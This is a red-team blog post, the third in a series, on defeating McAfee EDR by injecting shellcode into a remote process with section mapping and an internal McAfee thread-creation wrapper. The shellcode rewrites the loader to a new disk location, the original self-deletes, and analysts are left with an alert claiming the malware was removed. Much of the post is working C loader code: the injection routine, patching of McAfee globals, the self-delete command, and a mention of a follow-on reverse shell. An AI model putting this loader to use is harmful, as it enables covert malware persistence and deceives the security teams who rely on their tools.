Blending with McAfee [Part-3]

Malwares are like parasites. They like to sit on other processes and perform malicious acts from there if possible. This behavior makes them hard to detect and stealthier because they mostly hide themselves inside the legitimate processes. They leverage one of the well-known, easiest and widely used WinAPI i.e., CreateRemoteThread (CRT) to inject themselves into other processes. Because of this AV/EDRs heavily monitor this API by every possible means such as userland-hooking, event monitoring, kernel monitoring etc.

While playing with McAfee EDR the initial plan was to bypass this EDR and somehow make CreateRemoteThread API work again because a normal call to CreateRemoteThread was detected as malicious. We found out McAfee hooks both the API CreateRemoteThread and CreateRemoteThreadEx however, it doesn’t hook the API NtCreateThreadEx in ntdll. We tried the NtCreateThreadEx API with excitement because it wasn’t hooked; however, our payload was detected and deleted every time. We tried every possible way to call CRT API but we failed every time. Below is all the test that we performed:

At this point we know that API call to CreateRemoteThread is not detected when internet/cloud protection is off and also with the local process handle it’s not detected.

if (cloud_protection_on && handle_in_CRT != -1) {

return process_is_malicious_perform_delete_action

}

We tried a few other things as well to make the CRT call not detectable but eventually failed. There are few other working ways to bypass both cloud and adaptive protection and execute our payload in a remote process. However, we insisted on using CRT no matter what obstacles came our way.

How exactly does McAfee EDR react to API call CreateRemoteThread?

In our loader/payload we dynamically located and called CreateRemoteThread which prevented McAfee EDR from detecting our payload/loader as malicious at Runtime. We delayed our program before calling CreateRemoteThread API for like 2 minutes. During that 2 minute nothing happened. After that, CreateRemoteThread was executed also the shellcode was executed normally in the remote process however within 10 – 12 seconds our loader/payload was detected as malicious and deleted immediately. Good thing is the shellcode was still running.

Abusing this behavior

Note: Before starting, we want you to make sure that this is not a bypass. The alert definitely will be generated and our payload/loader will still be deleted.

From the above section we know how McAfee behaves when CRT API is called. There are few things that we can take advantage of.

Our injected shellcode still runs even the loader/payload is deleted
There’s a time gap between the CRT execution and deletion of the loader/payload.

So, we came up with a plan to fool EDR and the analyst (not all 😊). The plan is simple, since the EDR is so powerful most of us will trust the EDR most of the time. If we look at the logs carefully it says that it has deleted our loader/payload. Now the EDR is mentioning that it has deleted the malware. We’ll believe it if we are lazy 😊. Our plan starts from here. We’ll simply move our shellcode and the loader into the target process memory. Then write our loader into the disk to another location before executing the actual shellcode functions. Finally self-destruct the executable. Basically, we’re hiding behind EDRs genuine alert. If we breakdown our plan:

Loader:

Write shellcode and loader into the target process
Execute CreateRemoteThread
Wait 7 seconds (So that shellcode can write loader to another location in disk)
Self-delete itself from the disk

Shellcode:

Write Loader buffer from memory to disk in new location
Update persistence mechanism (if implemented)
Cleanup the loader buffer from memory
Run other stuffs from shellcode for instance, reverse shell

Key Notes:

Loader is written to the disk from shellcode because even if loader writes itself to another location and self-destructs, the EDR’s going to delete that newly created file by the Loader.
Analyst will not find any trace of writing to disk by Loader if the loader buffer is written to disk from shellcode running in another process.
Loader is self-destroyed before EDR deletes it. The Alert is still generated by saying malware is successfully deleted. Now it depends upon the analysts whether to dig into the incident or to believe EDR.

Implementation

Since we’re playing with McAfee EDR, we decided to use EDR-Recast technique [EDR-Recast link] as well. Also, to avoid WriteProcessMemory calls we used NtCreateSection and NtMapViewOfSection technique to write our shellcode and loader buffer into the remote process.

We created 2 sections one for shellcode and another for loader buffer. Loader buffer needs to be copied first then the shellcode because few things need to be copied along with shellcode in the shellcode section. During section creation for the loader buffer the MAXIMUM_ALLOWED flag should be given because our loader buffer is more than 4k in size.

Then we map the section in both local and remote processes. After that loader buffer is copied to the local section base address. Since both processes share the same section, whatever buffer is copied to the local section base address, remote section base address will also receive the same buffer.

// CreateSection for payload SIZE_T actualSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData); SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData); LARGE_INTEGER lScSize = { scSize }; // MAXIMUM_ALLOWED => this flags allows to create section larger than 4K status = fpNtCreateSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED, NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); if (!NT_SUCCESS(status)) { perror("[+] Error on Creating Section\n"); exit(-1); } printf("[+] Section Created\n"); // Map view of section to local process PVOID localSectionBaseAddr = { 0 }; PVOID remoteSectionBaseAddr = { 0 }; status = fpNtMapViewOfSection(hSection, GetCurrentProcess(), &localSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE); if (!NT_SUCCESS(status)) { perror("[+] Error on NtMapViewOfSection Local\n"); exit(-1); } //DelayExecution(0x4); printf("[+] Mapped view to local process\n"); CLIENT_ID pid; InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); pid.UniqueProcess = (HANDLE)(a_pid); pid.UniqueThread = (HANDLE)0; // Getting handle to target process fpZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &pid); if (hProcess == INVALID_HANDLE_VALUE) { printf("[-] Invalid Handle Value \n"); } printf("[+] Got handle to the process %d\n", (DWORD)hProcess); //DelayExecution(0x6); // Map view of section to target process //For shellcode RWX status = fpNtMapViewOfSection(hSection, hProcess, &remoteSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READ); if (!NT_SUCCESS(status)) { perror("[+] Error on NtMapViewOfSection Remote\n"); exit(-1); } printf("[+] Mapped view to remote process\n");

Same process is done for the shellcode however, we need to provide few information to the shellcode

New path where we want to place our loader buffer
Base address of loader buffer in memory i.e., base address of remote section
Size of loader buffer

// [-- We created the section for shellcode but we'll not copy our shellcode // there's something we need to add before copying shellcode --] // CreateSection for payload buffer // Getting payload and payload size wchar_t payload_addr[0x100] = { 0 }; size_t len = 0; mbstowcs_s(&len, payload_addr, argv[0], strlen(argv[0])); wprintf(L"[+] Payload Name %s\n", payload_addr); //system("pause"); size_t payload_size = 0; BYTE* buffer = GetPayloadBuffer(payload_addr, payload_size); SIZE_T p_size = payload_size; //SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData); lScSize = { p_size }; status = fpNtCreateSection(&pHSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED, NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); if (!NT_SUCCESS(status)) { perror("[+] Error on Creating Section\n"); exit(-1); } printf("[+] Section Created\n"); //DelayExecution(0x2); // Map view of section to local process PVOID localPESectionBaseAddr = { 0 }; PVOID remotePESectionBaseAddr = { 0 }; status = fpNtMapViewOfSection(pHSection, GetCurrentProcess(), &localPESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE); if (!NT_SUCCESS(status)) { perror("[+] Error on NtMapViewOfSection Local\n"); exit(-1); } printf("[+] Mapped view to local process\n"); // Map view of section to target process //For shellcode RWX status = fpNtMapViewOfSection(pHSection, hProcess, &remotePESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READ); if (!NT_SUCCESS(status)) { perror("[+] Error on NtMapViewOfSection Remote\n"); exit(-1); } printf("[+] Mapped view to remote process\n"); printf("[+] Copying PE to mapped section...\n"); memcpy((void*)localPESectionBaseAddr, buffer, payload_size);

Since we are calling the CreateRemoteThread API we can pass the parameter (lpParameter) to the thread function (shellcode/StartAddress). However, we need to pass multiple information to the shellcode. To solve this issue, we created the structure “XShellData” which has 3 members: new_path, mem_loc, copy_size.

new_path: new path location to move loader buffer
mem_loc: loader buffer memory location
copy_size: number of bytes to copy (size of loader buffer)

Heap is allocated with the size of (shellcode + junks + XShellData). Once the shellcode, junk bytes and the XShellData is copied to the heap, the data in heap will be copied to the local section address created for shellcode. Now the shellcode and buffer in XShellData are copied to the remote section base address as well. Now it’s time to call CreateRemoteThread API, for lpStartAddress remote base address of shellcode is given and for lpParameter remote base address of XShellData is given i.e., remote base address + sizeof(shellcode) + sizeof(junks).

// setting up parameters char newPath[0x100] = ""; // This is the path where we move our shellcode. This path can be dynamically // generated or can be encrypted for stealthier. // TODO: Finding Random Directory with RWX permission // TODO: Generate Random name for the payload strcat_s(newPath, "C:\\Users\\Xploiter\\AppData\\Local\\Temp\\test.exe"); strcpy_s(ShellData.new_path, newPath); ShellData.mem_loc = remotePESectionBaseAddr; ShellData.copy_size = payload_size; memcpy((void*)((UINT_PTR)heapAddr + sizeof(buf) + sizeof(junks)), &ShellData, sizeof(ShellData)); printf("[+] Copying payload to mapped section...\n"); memcpy((void*)localSectionBaseAddr, heapAddr, actualSize); // Patching Global for CRT DWORD CUTPatchAddr = ((ULONG_PTR)hMfehcinj + CUT); DWORD CUTPatchBytes = 0x0; DWORD CRTPatchAddr = ((ULONG_PTR)hMfehcinj + CRT); pResolveProcAddress("kernel32.dll", "CreateRemoteThreadEx", &procAddr); DWORD CRTPatchBytes = (DWORD)procAddr; memcpy((void*)CUTPatchAddr, &CUTPatchBytes, sizeof(DWORD)); memcpy((void*)CRTPatchAddr, &CRTPatchBytes, sizeof(DWORD));

LPTHREAD_START_ROUTINE runME = (LPTHREAD_START_ROUTINE)remoteSectionBaseAddr; printf("[+] Executing...\n"); //Crafting Remote Thread CreateUserOrRemoteThread createUserOrRemoteThread = (CreateUserOrRemoteThread)((UINT_PTR)hMfehcinj + CURTFunc); // param location offset DWORD param = sizeof(buf) + sizeof(junks); createUserOrRemoteThread((void*)hProcess, (void*)remoteSectionBaseAddr, (void*)((UINT_PTR)remoteSectionBaseAddr + param)); // Self-destruct // https://stackoverflow.com/questions/1606140/how-can-a-program-delete-its-own-executable/66847136#66847136 // alternatively we can put our binary // in delete-pending state char* process_name = argv[0]; char delCommand[256] = "start /min cmd /c del "; strcat_s(delCommand, process_name); // Delaying before self-destruct so that shellcode can move the binary to other location printf("[+] Delaying Before self-destruct...\n"); DelayExecution(0x7); printf("[+] Attempting to delete itself...\n"); system(delCommand);

Following is the visualization of how shellcode, junks, and XShellData are aligned in memory.

Now in shellcode, the parameter (base address of XShellData) that is passed from CRT is at esp + 8. From there shellcode will parse all 3 members new_path, mem_loc, copy_size. And writes loader to a new location after that other functionality will be executed.

Video : https://drive.google.com/file/d/1Tt-BtjzQOSqaBgGw8dhY0gR4SuazXLsy/view

Project Link : https://github.com/RedTeamOperations/Journey-to-McAfee/tree/main/TrueAlert

Conclusion

Almost all the EDRs perform behavioral analysis to detect the malware which makes red teamers/threat actors very difficult to perform their action. Usually most of our favorite techniques are detected by AV/EDRs no matter what. It’s quite difficult to bypass EDRs these days, however we can also perform behavioral analysis on EDR and craft special payload/malware to specific EDR like we did in this blog. Also, security analysts shouldn’t fully trust the EDR even though it’s very powerful. Usually unexpected things happen in powerful places.

Stay connected with news and updates!

Join our mailing list to receive the latest news and updates of cutting-edge cyber security research from our team.
Don’t worry, your information will not be shared.

We hate SPAM. We will never sell your information, for any reason.